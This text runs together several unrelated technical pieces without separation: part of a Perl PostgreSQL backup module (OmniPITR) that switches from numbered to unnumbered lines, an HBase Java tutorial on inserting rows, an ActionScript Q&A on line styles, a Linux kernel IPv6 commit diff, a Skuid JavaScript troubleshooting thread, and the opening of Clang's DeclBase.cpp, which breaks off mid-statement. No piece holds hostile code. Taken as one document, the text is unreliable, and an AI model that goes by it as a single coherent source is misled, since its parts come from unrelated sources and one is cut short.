118 my $destination_filename = $dst->{ 'path' };
119 $destination_filename =~ s{/*\z}{/};
120 $destination_filename .= $filename;
121
122 my $time_msg = sprintf 'Copying %s to %s', $source_filename, $destination_filename;
123 $self->log->time_start( $time_msg ) if $self->verbose;
124
125 my $response = run_command( $self->{ 'temp-dir' }, $self->{ 'rsync-path' }, $source_filename, $destination_filename );
126
127 $self->log->time_finish( $time_msg ) if $self->verbose;
128
129 if ( $response->{ 'error_code' } ) {
130 $self->log->error( 'Cannot send archive %s to %s: %s', $source_filename, $destination_filename, $response );
131 $self->{ 'had_errors' } = 1;
132 }
133 }
134 }
135 return;
136 }
137
138 =head1 compress_xlogs()
139
140 Wrapper function which encapsulates all work required to compress xlog segments that accumulated during backup of data directory.
141
142 =cut
143
144 sub compress_xlogs {
145 my $self = shift;
146 $self->log->time_start( 'Compressing xlogs' ) if $self->verbose;
147 $self->start_writers( 'xlog' );
148
149 $self->tar_and_compress(
150 'work_dir' => $self->{ 'xlogs' } . '.real',
151 'tar_dir' => basename( $self->{ 'data-dir' } ),
152 );
153 $self->log->time_finish( 'Compressing xlogs' ) if $self->verbose;
154
155 return;
156 }
157
158 =head1 compress_pgdata()
159
160 Wrapper function which encapsulates all work required to compress data directory.
161
162 =cut
163
164 sub compress_pgdata {
165 my $self = shift;
166 $self->log->time_start( 'Compressing $PGDATA' ) if $self->verbose;
167 $self->start_writers( 'data' );
168
169 $self->tar_and_compress(
170 'work_dir' => dirname( $self->{ 'data-dir' } ),
171 'tar_dir' => basename( $self->{ 'data-dir' } ),
172 'excludes' => [ qw( pg_log/* pg_xlog/0* pg_xlog/archive_status/* postmaster.pid ) ],
173 );
174
175 $self->log->time_finish( 'Compressing $PGDATA' ) if $self->verbose;
176 return;
177 }
178
179 =head1 tar_and_compress()
180
181 Worker function which does all of the actual tar, and sending data to compression filehandles.
182
183 Takes hash (not hashref) as argument, and uses following keys from it:
184
185 =over
186
187 =item * tar_dir - which directory to compress
188
189 =item * work_dir - what should be current working directory when executing tar
190
191 =item * excludes - optional key, that (if exists) is treated as arrayref of shell globs (tar dir) of items to exclude from backup
192
193 =back
194
195 If tar prints anything to STDERR it will be logged. The error status code is ignored, as tar is expected to generate errors (due to files modified while archiving).
196
197 =cut
198
199 sub tar_and_compress {
200 my $self = shift;
201 my %ARGS = @_;
202
203 my @compression_command = ( $self->{ 'nice-path' }, $self->{ 'tar-path' }, 'cf', '-' );
204 if ( $ARGS{ 'excludes' } ) {
205 push @compression_command, map { sprintf '--exclude=%s/%s', $ARGS{ 'tar_dir' }, $_ } @{ $ARGS{ 'excludes' } };
206 }
207 push @compression_command, $ARGS{ 'tar_dir' };
208
209 my $compression_str = join ' ', map { quotemeta $_ } @compression_command;
210
211 $self->prepare_temp_directory();
212 my $tar_stderr_filename = File::Spec->catfile( $self->{ 'temp-dir' }, 'tar.stderr' );
213 $compression_str .= ' 2> ' . quotemeta( $tar_stderr_filename );
214
215 my $previous_dir = getcwd;
216 chdir $ARGS{ 'work_dir' } if $ARGS{ 'work_dir' };
217
218 my $tar;
219 unless ( open $tar, '-|', $compression_str ) {
220 $self->clean_and_die( 'Cannot start tar (%s) : %s', $compression_str, $OS_ERROR );
221 }
222
223 chdir $previous_dir if $ARGS{ 'work_dir' };
224
225 my $buffer;
226 while ( my $len = sysread( $tar, $buffer, 8192 ) ) {
227 while ( my ( $type, $fh ) = each %{ $self->{ 'writers' } } ) {
228 my $written = syswrite( $fh, $buffer, $len );
229 next if $written == $len;
230 $self->clean_and_die( "Writing %u bytes to filehandle for <%s> compression wrote only %u bytes ?!", $len, $type, $written );
231 }
232 }
233 close $tar;
234
235 for my $fh ( values %{ $self->{ 'writers' } } ) {
236 close $fh;
237 }
238
239 delete $self->{ 'writers' };
240
241 my $stderr_output;
242 my $stderr;
243 unless ( open $stderr, '<', $tar_stderr_filename ) {
244 $self->log->log( 'Cannot open tar stderr file (%s) for reading: %s', $tar_stderr_filename, $OS_ERROR );
245 return;
246 }
247 {
248 local $/;
249 $stderr_output = <$stderr>;
250 };
251 close $stderr;
252 return unless $stderr_output;
253 $self->log->log( 'Tar (%s) generated these output on stderr:', $compression_str );
254 $self->log->log( '==============================================' );
255 $self->log->log( '%s', $stderr_output );
256 $self->log->log( '==============================================' );
257 unlink $tar_stderr_filename;
258 return;
259 }
260
261 =head1 start_writers()
262
263 Starts set of filehandles, which write to file, or to compression program, to create final archives.
264
265 Each compression schema gets its own filehandle, and printing data to it, will pass it to file directly or through compression program that has been chosen based on command line arguments.
266
267 =cut
268
269 sub start_writers {
270 my $self = shift;
271 my $data_type = shift;
272
273 my %writers = ();
274
275 COMPRESSION:
276 while ( my ( $type, $dst_path ) = each %{ $self->{ 'base' } } ) {
277 my $filename = $self->get_archive_filename( $data_type, $type );
278
279 my $full_file_path = File::Spec->catfile( $dst_path, $filename );
280
281 if ( $type eq 'none' ) {
282 if ( open my $fh, '>', $full_file_path ) {
283 $writers{ $type } = $fh;
284 $self->log->log( "Starting \"none\" writer to $full_file_path" ) if $self->verbose;
285 next COMPRESSION;
286 }
287 $self->clean_and_die( 'Cannot write to %s : %s', $full_file_path, $OS_ERROR );
288 }
289
290 my @command = map { quotemeta $_ } ( $self->{ 'nice-path' }, $self->{ $type . '-path' }, '--stdout', '-' );
291 push @command, ( '>', quotemeta( $full_file_path ) );
292
293 $self->log->log( "Starting \"%s\" writer to %s", $type, $full_file_path ) if $self->verbose;
294 if ( open my $fh, '|-', join( ' ', @command ) ) {
295 $writers{ $type } = $fh;
296 next COMPRESSION;
297 }
298 $self->clean_and_die( 'Cannot open command. Error: %s, Command: %s', $OS_ERROR, \@command );
299 }
300 $self->{ 'writers' } = \%writers;
301 return;
302 }
303
304 =head1 get_archive_filename()
305
306 Helper function, which takes filetype and compression schema to use, and returns generated filename (based on filename-template command line option).
307
308 =cut
309
310 sub get_archive_filename {
311 my $self = shift;
312 my ( $type, $compression ) = @_;
313
314 my $ext = $compression eq 'none' ? '' : ext_for_compression( $compression );
315
316 my $filename = $self->{ 'filename-template' };
317 $filename =~ s/__FILETYPE__/$type/g;
318 $filename =~ s/__CEXT__/$ext/g;
319
320 return $filename;
321 }
322
323 =head1 stop_pg_backup()
324
325 Runs pg_stop_backup() PostgreSQL function, which is crucial in backup process.
326
327 This happens after data directory compression, but before compression of xlogs.
328
329 This function also removes temporary destination for xlogs (dst-backup for omnipitr-archive).
330
331 =cut
332
333 sub stop_pg_backup {
334 my $self = shift;
335
336 $self->prepare_temp_directory();
337
338 my @command = ( @{ $self->{ 'psql' } }, "SELECT pg_stop_backup()" );
339
340 $self->log->time_start( 'pg_stop_backup()' ) if $self->verbose;
341 my $status = run_command( $self->{ 'temp-dir' }, @command );
342 $self->log->time_finish( 'pg_stop_backup()' ) if $self->verbose;
343
344 $self->clean_and_die( 'Running pg_stop_backup() failed: %s', $status ) if $status->{ 'error_code' };
345
346 $status->{ 'stdout' } =~ s/\s*\z//;
347 $self->log->log( q{pg_stop_backup('omnipitr') returned %s.}, $status->{ 'stdout' } );
348
349 my $subdir = basename( $self->{ 'data-dir' } );
350
351 unlink( $self->{ 'xlogs' } );
352
353 return;
354 }
355
356 =head1 start_pg_backup()
357
358 Executes pg_start_backup() postgresql function, and (before it) creates temporary destination for xlogs (dst-backup for omnipitr-archive).
359
360 =cut
361
362 sub start_pg_backup {
363 my $self = shift;
364
365 my $subdir = basename( $self->{ 'data-dir' } );
366 $self->clean_and_die( 'Cannot create directory %s : %s', $self->{ 'xlogs' } . '.real', $OS_ERROR ) unless mkdir( $self->{ 'xlogs' } . '.real' );
367 $self->clean_and_die( 'Cannot create directory %s : %s', $self->{ 'xlogs' } . ".real/$subdir", $OS_ERROR ) unless mkdir( $self->{ 'xlogs' } . ".real/$subdir" );
368 $self->clean_and_die( 'Cannot create directory %s : %s', $self->{ 'xlogs' } . ".real/$subdir/pg_xlog", $OS_ERROR ) unless mkdir( $self->{ 'xlogs' } . ".real/$subdir/pg_xlog" );
369 $self->clean_and_die( 'Cannot symlink %s to %s: %s', $self->{ 'xlogs' } . ".real/$subdir/pg_xlog", $self->{ 'xlogs' }, $OS_ERROR )
370 unless symlink( $self->{ 'xlogs' } . ".real/$subdir/pg_xlog", $self->{ 'xlogs' } );
371
372 $self->prepare_temp_directory();
373
374 my @command = ( @{ $self->{ 'psql' } }, "SELECT pg_start_backup('omnipitr')" );
375
376 $self->log->time_start( 'pg_start_backup()' ) if $self->verbose;
377 my $status = run_command( $self->{ 'temp-dir' }, @command );
378 $self->log->time_finish( 'pg_start_backup()' ) if $self->verbose;
379
380 $self->clean_and_die( 'Running pg_start_backup() failed: %s', $status ) if $status->{ 'error_code' };
381
382 $status->{ 'stdout' } =~ s/\s*\z//;
383 $self->log->log( q{pg_start_backup('omnipitr') returned %s.}, $status->{ 'stdout' } );
384
385 return;
386 }
387
388 =head1 clean_and_die()
389
390 Helper function called by other parts of the code - removes the temporary destination for xlogs, and exits the program, logging the passed message.
391
392 =cut
393
394 sub clean_and_die {
395 my $self = shift;
396 my @msg_with_args = @_;
397 rmtree( $self->{ 'xlogs' } . '.real', $self->{ 'xlogs' } );
398 $self->log->fatal( @msg_with_args );
399 }
400
401 =head1 choose_base_local_destinations()
402
403 Chooses single local destination for every compression schema required by destinations specifications.
404
405 In case some compression schema exists only for remote destination, local temp directory is created in --temp-dir location.
406
407 =cut
408
409 sub choose_base_local_destinations {
410 my $self = shift;
411
412 my $base = { map { ( $_ => undef ) } @{ $self->{ 'compressions' } } };
413 $self->{ 'base' } = $base;
414
415 for my $dst ( @{ $self->{ 'destination' }->{ 'local' } } ) {
416 my $type = $dst->{ 'compression' };
417 next if defined $base->{ $type };
418 $base->{ $type } = $dst->{ 'path' };
419 }
420
421 my @unfilled = grep { !defined $base->{ $_ } } keys %{ $base };
422
423 return if 0 == scalar @unfilled;
424 $self->log->log( 'These compression(s) were given only for remote destinations. Usually this is not desired: %s', join( ', ', @unfilled ) );
425
426 $self->prepare_temp_directory();
427 for my $type ( @unfilled ) {
428 my $tmp_dir = File::Spec->catfile( $self->{ 'temp-dir' }, $type );
429 mkpath( $tmp_dir );
430 $base->{ $type } = $tmp_dir;
431 }
432
433 return;
434 }
435
436 =head1 DESTROY()
437
438 Destructor for object - removes temp directory on program exit.
439
440 =cut
441
442 sub DESTROY {
443 my $self = shift;
444 return unless $self->{ 'temp-dir-prepared' };
445 rmtree( $self->{ 'temp-dir-prepared' } );
446 return;
447 }
448
449 =head1 prepare_temp_directory()
450
451 Helper function, which builds path for temp directory, and creates it.
452
453 Path is generated by using the given temp-dir and the 'omnipitr-backup-master' name.
454
455 For example, for temp-dir '/tmp' used temp directory would be /tmp/omnipitr-backup-master.
456
457 =cut
458
459 sub prepare_temp_directory {
460 my $self = shift;
461 return if $self->{ 'temp-dir-prepared' };
462 my $full_temp_dir = File::Spec->catfile( $self->{ 'temp-dir' }, basename( $PROGRAM_NAME ) );
463 mkpath( $full_temp_dir );
464 $self->{ 'temp-dir' } = $full_temp_dir;
465 $self->{ 'temp-dir-prepared' } = $full_temp_dir;
466 return;
467 }

=head1 get_list_of_all_necessary_compressions()

Scans list of destinations, and gathers list of all compressions that have to be made.

This is to be able to compress file only once even when having multiple destinations that require compressed format.

=cut

sub get_list_of_all_necessary_compressions {
    my $self = shift;

    my %compression = ();

    for my $dst_type ( qw( local remote ) ) {
        next unless my $dsts = $self->{ 'destination' }->{ $dst_type };
        for my $destination ( @{ $dsts } ) {
            $compression{ $destination->{ 'compression' } } = 1;
        }
    }
    $self->{ 'compressions' } = [ keys %compression ];
    return;
}

=head1 read_args()

Function which does all the parsing, and transformation of command line arguments.

=cut

sub read_args {
    my $self = shift;

    my @argv_copy = @ARGV;

    my %args = (
        'temp-dir'          => $ENV{ 'TMPDIR' } || '/tmp',
        'gzip-path'         => 'gzip',
        'bzip2-path'        => 'bzip2',
        'lzma-path'         => 'lzma',
        'tar-path'          => 'tar',
        'nice-path'         => 'nice',
        'psql-path'         => 'psql',
        'rsync-path'        => 'rsync',
        'database'          => 'postgres',
        'filename-template' => '__HOSTNAME__-__FILETYPE__-^Y-^m-^d.tar__CEXT__',
    );

    croak( 'Error while reading command line arguments. Please check documentation in doc/omnipitr-backup-master.pod' )
        unless GetOptions(
        \%args,
        'data-dir|D=s',
        'database|d=s',
        'host|h=s',
        'port|p=i',
        'username|U=s',
        'xlogs|x=s',
        'dst-local|dl=s@',
        'dst-remote|dr=s@',
        'temp-dir|t=s',
        'log|l=s',
        'filename-template|f=s',
        'pid-file',
        'verbose|v',
        'gzip-path|gp=s',
        'bzip2-path|bp=s',
        'lzma-path|lp=s',
        'nice-path|np=s',
        'psql-path|pp=s',
        'tar-path|tp=s',
        'rsync-path|rp=s',
        );

    croak( '--log was not provided - cannot continue.' ) unless $args{ 'log' };
    for my $key ( qw( log filename-template ) ) {
        $args{ $key } =~ tr/^/%/;
    }

    for my $key ( grep { !/^dst-(?:local|remote)$/ } keys %args ) {
        $self->{ $key } = $args{ $key };
    }

    for my $type ( qw( local remote ) ) {
        my $D = [];
        $self->{ 'destination' }->{ $type } = $D;

        next unless defined $args{ 'dst-' . $type };

        my %temp_for_uniq = ();
        my @items = grep { !$temp_for_uniq{ $_ }++ } @{ $args{ 'dst-' . $type } };

        for my $item ( @items ) {
            my $current = { 'compression' => 'none', };
            if ( $item =~ s/\A(gzip|bzip2|lzma)=// ) {
                $current->{ 'compression' } = $1;
            }
            $current->{ 'path' } = $item;
            push @{ $D }, $current;
        }
    }

    $self->{ 'filename-template' } = strftime( $self->{ 'filename-template' }, localtime time() );
    $self->{ 'filename-template' } =~ s/__HOSTNAME__/hostname()/ge;

    # We do it here so it will actually work for reporting problems in validation
    $self->{ 'log_template' } = $args{ 'log' };
    $self->{ 'log' }          = OmniPITR::Log->new( $self->{ 'log_template' } );

    $self->log->log( 'Called with parameters: %s', join( ' ', @argv_copy ) ) if $self->verbose;

    my @psql = ();
    push @psql, $self->{ 'psql-path' };
    push @psql, '-qAtX';
    push @psql, ( '-U', $self->{ 'username' } ) if $self->{ 'username' };
    push @psql, ( '-d', $self->{ 'database' } ) if $self->{ 'database' };
    push @psql, ( '-h', $self->{ 'host' } )     if $self->{ 'host' };
    push @psql, ( '-p', $self->{ 'port' } )     if $self->{ 'port' };
    push @psql, '-c';
    $self->{ 'psql' } = \@psql;

    return;
}

=head1 validate_args()

Does all necessary validation of given command line arguments.

One exception is for compression programs paths - technically, it could be validated in here, but benefit would be pretty limited, and code to do so relatively complex, as compression program path
might, but doesn't have to be actual file path - it might be just program name (without path), which is the default.

=cut

sub validate_args {
    my $self = shift;

    $self->log->fatal( 'Data-dir was not provided!' ) unless defined $self->{ 'data-dir' };
    $self->log->fatal( 'Provided data-dir (%s) does not exist!',   $self->{ 'data-dir' } ) unless -e $self->{ 'data-dir' };
    $self->log->fatal( 'Provided data-dir (%s) is not directory!', $self->{ 'data-dir' } ) unless -d $self->{ 'data-dir' };
    $self->log->fatal( 'Provided data-dir (%s) is not readable!',  $self->{ 'data-dir' } ) unless -r $self->{ 'data-dir' };

    my $dst_count = scalar( @{ $self->{ 'destination' }->{ 'local' } } ) + scalar( @{ $self->{ 'destination' }->{ 'remote' } } );
    $self->log->fatal( "No --dst-* has been provided!" ) if 0 == $dst_count;

    $self->log->fatal( "Filename template does not contain __FILETYPE__ placeholder!" ) unless $self->{ 'filename-template' } =~ /__FILETYPE__/;
    $self->log->fatal( "Filename template cannot contain / or \\ characters!" ) if $self->{ 'filename-template' } =~ m{[/\\]};

    $self->log->fatal( "Xlogs dir (--xlogs) was not given! Cannot work without it" ) unless defined $self->{ 'xlogs' };
    $self->{ 'xlogs' } =~ s{/+$}{};
    $self->log->fatal( "Xlogs dir (%s) already exists! It shouldn't.", $self->{ 'xlogs' } ) if -e $self->{ 'xlogs' };
    $self->log->fatal( "Xlogs side dir (%s.real) already exists! It shouldn't.", $self->{ 'xlogs' } ) if -e $self->{ 'xlogs' } . '.real';

    my $xlog_parent = dirname( $self->{ 'xlogs' } );
    $self->log->fatal( 'Xlogs dir (%s) parent (%s) does not exist. Cannot continue.',   $self->{ 'xlogs' }, $xlog_parent ) unless -e $xlog_parent;
    $self->log->fatal( 'Xlogs dir (%s) parent (%s) is not directory. Cannot continue.', $self->{ 'xlogs' }, $xlog_parent ) unless -d $xlog_parent;
    $self->log->fatal( 'Xlogs dir (%s) parent (%s) is not writable. Cannot continue.',  $self->{ 'xlogs' }, $xlog_parent ) unless -w $xlog_parent;

    return;
}

1;
Basic HBase Java Classes and Methods – Part 4: Putting Data into a Table
To put data into a table in HBase, we will create a class very similar in structure to our last class in Part 3. Instead of using an Admin object, which is used to create or delete a table, we will just work with a regular Table object. All data in HBase is stored as byte arrays. Let's create our imports and basic variables to store our column family names and columns.
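A minimal sketch of that setup might look like the following (the sensor table, its data column family, and the temperature/humidity qualifiers are hypothetical names used only for illustration, and the HBase 1.x client API is assumed; the class body is filled in step by step below and assembled into a complete program at the end):

import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Put;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.util.Bytes;

public class PutExample {

    // Hypothetical table and column names, stored as byte arrays.
    private static final TableName TABLE_NAME   = TableName.valueOf("sensor");
    private static final byte[]    CF_DATA      = Bytes.toBytes("data");
    private static final byte[]    COL_TEMP     = Bytes.toBytes("temperature");
    private static final byte[]    COL_HUMIDITY = Bytes.toBytes("humidity");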
Now we create our main method, create a connection to our table, instantiate a Put object, and add columns to it using the addColumn method. Finally, we use the put method on the Table object to write the data into the table. The table is declared outside of the try block because we need to check for it in the finally block later on, and we can't do that if it's declared inside the try block, as it would then be out of scope.
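A sketch of that main method, continuing the hypothetical PutExample class above (connection settings are taken from the usual hbase-site.xml on the classpath):

    public static void main(String[] args) throws IOException {
        Configuration conf = HBaseConfiguration.create();
        Connection connection = ConnectionFactory.createConnection(conf);

        // Declared outside the try block so the finally block can still reach it.
        Table table = null;

        try {
            table = connection.getTable(TABLE_NAME);

            // A Put is keyed by the row key; each cell is added with addColumn(family, qualifier, value).
            Put put = new Put(Bytes.toBytes("row1"));
            put.addColumn(CF_DATA, COL_TEMP, Bytes.toBytes("21.5"));
            put.addColumn(CF_DATA, COL_HUMIDITY, Bytes.toBytes("40"));

            table.put(put);
        } finally {
            // cleanup is shown in the finally block below
        }
    }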
This is a very simple case. We did not have to insert all of the columns; we could have left many blank, just as we did before when using the HBase shell. The HBase Table put method is overloaded and accepts either a single Put object or a list of Put objects. We will now put in more data using a list of Put objects.
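Inside the same try block, a batch insert with the overloaded put(List&lt;Put&gt;) might look like this (row keys and values are again made up for illustration):

            // table.put() also accepts a List<Put>, writing several rows in one call.
            List<Put> puts = new ArrayList<>();

            Put put2 = new Put(Bytes.toBytes("row2"));
            put2.addColumn(CF_DATA, COL_TEMP, Bytes.toBytes("19.8"));
            puts.add(put2);

            Put put3 = new Put(Bytes.toBytes("row3"));
            put3.addColumn(CF_DATA, COL_HUMIDITY, Bytes.toBytes("55"));
            puts.add(put3);

            table.put(puts);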
Last, we will use our finally block to check whether we have an open table, close it if so, and then close our connection to HBase.
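A sketch of that finally block:

        } finally {
            // Close the table first (if it was opened), then the connection.
            if (table != null) {
                table.close();
            }
            connection.close();
        }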
So the completed program looks like this:
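Assembled from the sketches above (again with hypothetical table, column, and row names rather than the exact ones used in this series), a complete version might be:

import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Put;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.util.Bytes;

public class PutExample {

    private static final TableName TABLE_NAME   = TableName.valueOf("sensor");
    private static final byte[]    CF_DATA      = Bytes.toBytes("data");
    private static final byte[]    COL_TEMP     = Bytes.toBytes("temperature");
    private static final byte[]    COL_HUMIDITY = Bytes.toBytes("humidity");

    public static void main(String[] args) throws IOException {
        Configuration conf = HBaseConfiguration.create();
        Connection connection = ConnectionFactory.createConnection(conf);
        Table table = null;

        try {
            table = connection.getTable(TABLE_NAME);

            // Single put: one row, two columns.
            Put put = new Put(Bytes.toBytes("row1"));
            put.addColumn(CF_DATA, COL_TEMP, Bytes.toBytes("21.5"));
            put.addColumn(CF_DATA, COL_HUMIDITY, Bytes.toBytes("40"));
            table.put(put);

            // Batch put: a List<Put> inserted in one call.
            List<Put> puts = new ArrayList<>();

            Put put2 = new Put(Bytes.toBytes("row2"));
            put2.addColumn(CF_DATA, COL_TEMP, Bytes.toBytes("19.8"));
            puts.add(put2);

            Put put3 = new Put(Bytes.toBytes("row3"));
            put3.addColumn(CF_DATA, COL_HUMIDITY, Bytes.toBytes("55"));
            puts.add(put3);

            table.put(puts);
        } finally {
            if (table != null) {
                table.close();
            }
            connection.close();
        }
    }
}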
We can verify that our data was added properly by running a scan from the HBase shell.
Next we will explore how we can retrieve column data from the HBase table in Basic HBase Java Classes and Methods – Part 5: Getting Data from a Table.
I draw a line using "graphics.lineTo" into a movie clip, and I need to change its line style if the user asks for that through a button at runtime. I can change the color, but I can't change the line style...
Is there some way to change it?
1 Answer
You cannot change the line style once the line has been drawn. You need to record the steps that produce the graphics (moveTo, lineTo, lineStyle, beginFill, etc.) yourself and replay them when the user changes the line style.
Commit 971f359d authored by YOSHIFUJI Hideaki, committed by David S. Miller
[IPV6]: Put addr_diff() into common header for future use.
Signed-off-by: YOSHIFUJI Hideaki <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
parent f093182d
@@ -340,6 +340,54 @@ static inline int ipv6_addr_any(const struct in6_addr *a)
a->s6_addr32[2] | a->s6_addr32[3] ) == 0);
}
/*
* find the first different bit between two addresses
* length of address must be a multiple of 32bits
*/
static inline int __ipv6_addr_diff(const void *token1, const void *token2, int addrlen)
{
const __u32 *a1 = token1, *a2 = token2;
int i;
addrlen >>= 2;
for (i = 0; i < addrlen; i++) {
__u32 xb = a1[i] ^ a2[i];
if (xb) {
int j = 31;
xb = ntohl(xb);
while ((xb & (1 << j)) == 0)
j--;
return (i * 32 + 31 - j);
}
}
/*
* we should *never* get to this point since that
* would mean the addrs are equal
*
* However, we do get to it 8) And exacly, when
* addresses are equal 8)
*
* ip route add 1111::/128 via ...
* ip route add 1111::/64 via ...
* and we are here.
*
* Ideally, this function should stop comparison
* at prefix length. It does not, but it is still OK,
* if returned value is greater than prefix length.
* --ANK (980803)
*/
return (addrlen << 5);
}
static inline int ipv6_addr_diff(const struct in6_addr *a1, const struct in6_addr *a2)
{
return __ipv6_addr_diff(a1, a2, sizeof(struct in6_addr));
}
/*
* Prototypes exported by ipv6
*/
@@ -127,56 +127,6 @@ static __inline__ int addr_bit_set(void *token, int fn_bit)
return htonl(1 << ((~fn_bit)&0x1F)) & addr[fn_bit>>5];
}
/*
* find the first different bit between two addresses
* length of address must be a multiple of 32bits
*/
static __inline__ int addr_diff(void *token1, void *token2, int addrlen)
{
__u32 *a1 = token1;
__u32 *a2 = token2;
int i;
addrlen >>= 2;
for (i = 0; i < addrlen; i++) {
__u32 xb;
xb = a1[i] ^ a2[i];
if (xb) {
int j = 31;
xb = ntohl(xb);
while ((xb & (1 << j)) == 0)
j--;
return (i * 32 + 31 - j);
}
}
/*
* we should *never* get to this point since that
* would mean the addrs are equal
*
* However, we do get to it 8) And exacly, when
* addresses are equal 8)
*
* ip route add 1111::/128 via ...
* ip route add 1111::/64 via ...
* and we are here.
*
* Ideally, this function should stop comparison
* at prefix length. It does not, but it is still OK,
* if returned value is greater than prefix length.
* --ANK (980803)
*/
return addrlen<<5;
}
static __inline__ struct fib6_node * node_alloc(void)
{
struct fib6_node *fn;
@@ -296,11 +246,11 @@ insert_above:
/* find 1st bit in difference between the 2 addrs.
See comment in addr_diff: bit may be an invalid value,
See comment in __ipv6_addr_diff: bit may be an invalid value,
but if it is >= plen, the value is ignored in any case.
*/
bit = addr_diff(addr, &key->addr, addrlen);
bit = __ipv6_addr_diff(addr, &key->addr, addrlen);
/*
* (intermediate)[in]
$.each( model.getRows() TypeError: Cannot read property 'each' of undefined
What am I doing wrong?
I have a table full of Proposal records. Each Proposal has a child record that we call a Commit. I want to let a user select some or all Proposals, enter a couple dates in a popup, and update those dates on the child Commit record of each selected Proposal.
The popup has a field editor with two date fields from a Ui-only model, and a title component with a button that runs the following snippet.
var table = skuid.$('#vwProposalTableFull'),
list,
datesModel = skuid.$M('vwCommitUpdates_UiOnly'); // the ui-only model that accepts new dates from the user
datesModel.save();
var datesRow = datesModel.getFirstRow(),
sentDate = datesModel.getFieldValue(datesRow,'Award_Letter_Sent_Ui'),
signedDate = datesModel.getFieldValue(datesRow,'Award_Letter_Signed_Ui');
// STEP 1: Load array with IDs of selected Proposals from the table. Funded only.
// This step works correctly.
if (table.length) {
list = table.data('object').list;
}
var idsArray = skuid.$.map(list.getSelectedItems(), function(item) {
if (item.row.Status__c == "Funded") {
return item.row.Id;
}
});
// STEP 2: Set condition to get only the Commits that belong to selected Proposals
// This step works correctly
var model = skuid.$M('vwCommitUpdates'),
condition = model.getConditionByName('Proposal_Details__c');
model.setCondition(condition, idsArray, false);
// STEP 3: Query model. When query completes, callback loops through each row to update date fields.
// This step is not working correctly.
model.updateData( function() {
try {
$.each(model.data, function(i, row) {
//if(row.Award_letter_sent__c ... I will set conditions here, when I get it working ) {
model.updateRow(row, 'Award_letter_sent__c', sentDate);
model.updateRow(row, 'Award_Letter_Signed__c', signedDate);
//}
});
} catch(err) {
console.log('error! ... ' + err); // Result is always: "TypeError: Cannot read property 'each' of undefined"
} finally {
console.log('code in finally');
}
model.save();
});
// STEP 4: housekeeping (close popup etc)
skuid.$('.ui-dialog-content').dialog('close');
Steps 1, 2, and 4 work correctly. I cannot get Step 3 to work. The result of my try/catch is always err: "TypeError: Cannot read property 'each' of undefined".
When I step through this code in the console, or use console.log to show the state of vars in each block, I see rows in model.
This syntax seems to obey the documentation here, https://docs.skuid.com/latest/en/skuid/api/skuid_model_model.html#skuid.model.Model.updateRows
I've tried the following variants in my try{} block, the result is the same TypeError: Cannot read property 'each' of undefined.
Variant 1:
var rowsToUpdate = {};
$.each( model.getRows(), function() {
    rowsToUpdate[this.Id] = {
        Award_letter_sent__c: sentDate,
        Award_Letter_Signed__c: signedDate
    };
});
model.updateRows( rowsToUpdate );
Variant 2:
var rows = [];
rows = model.getRows();
$.each(rows, function(row) {
    model.updateRow(row, {
        Award_letter_sent__c: sentDate,
        Award_Letter_Signed__c: signedDate
    });
});
Do you just need to use skuid.$.each?
Wow! Look at that. I must have deleted my var assignment of $ = skuid.$. Thank you for rescuing me from my deep well of over-thinking.
Yep. I noticed the skuid.$ elsewhere in the code. But I had to actually look up the reason for assigning the dollarSign to skuid.$.
//===--- DeclBase.cpp - Declaration AST Node Implementation ---------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file implements the Decl and DeclContext classes.
//
//===----------------------------------------------------------------------===//
#include "clang/AST/DeclBase.h"
#include "clang/AST/ASTContext.h"
#include "clang/AST/ASTMutationListener.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Decl.h"
#include "clang/AST/DeclCXX.h"
#include "clang/AST/DeclContextInternals.h"
#include "clang/AST/DeclFriend.h"
#include "clang/AST/DeclObjC.h"
#include "clang/AST/DeclOpenMP.h"
#include "clang/AST/DeclTemplate.h"
#include "clang/AST/DependentDiagnostic.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/Stmt.h"
#include "clang/AST/StmtCXX.h"
#include "clang/AST/Type.h"
#include "clang/Basic/TargetInfo.h"
#include "llvm/Support/raw_ostream.h"
#include <algorithm>
using namespace clang;
//===----------------------------------------------------------------------===//
// Statistics
//===----------------------------------------------------------------------===//
#define DECL(DERIVED, BASE) static int n##DERIVED##s = 0;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
void Decl::updateOutOfDate(IdentifierInfo &II) const {
getASTContext().getExternalSource()->updateOutOfDateIdentifier(II);
}
#define DECL(DERIVED, BASE) \
static_assert(llvm::AlignOf<Decl>::Alignment >= \
llvm::AlignOf<DERIVED##Decl>::Alignment, \
"Alignment sufficient after objects prepended to " #DERIVED);
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
void *Decl::operator new(std::size_t Size, const ASTContext &Context,
unsigned ID, std::size_t Extra) {
// Allocate an extra 8 bytes worth of storage, which ensures that the
// resulting pointer will still be 8-byte aligned.
static_assert(sizeof(unsigned) * 2 >= llvm::AlignOf<Decl>::Alignment,
"Decl won't be misaligned");
void *Start = Context.Allocate(Size + Extra + 8);
void *Result = (char*)Start + 8;
unsigned *PrefixPtr = (unsigned *)Result - 2;
// Zero out the first 4 bytes; this is used to store the owning module ID.
PrefixPtr[0] = 0;
// Store the global declaration ID in the second 4 bytes.
PrefixPtr[1] = ID;
return Result;
}
void *Decl::operator new(std::size_t Size, const ASTContext &Ctx,
DeclContext *Parent, std::size_t Extra) {
assert(!Parent || &Parent->getParentASTContext() == &Ctx);
// With local visibility enabled, we track the owning module even for local
// declarations.
if (Ctx.getLangOpts().ModulesLocalVisibility) {
// Ensure required alignment of the resulting object by adding extra
// padding at the start if required.
size_t ExtraAlign =
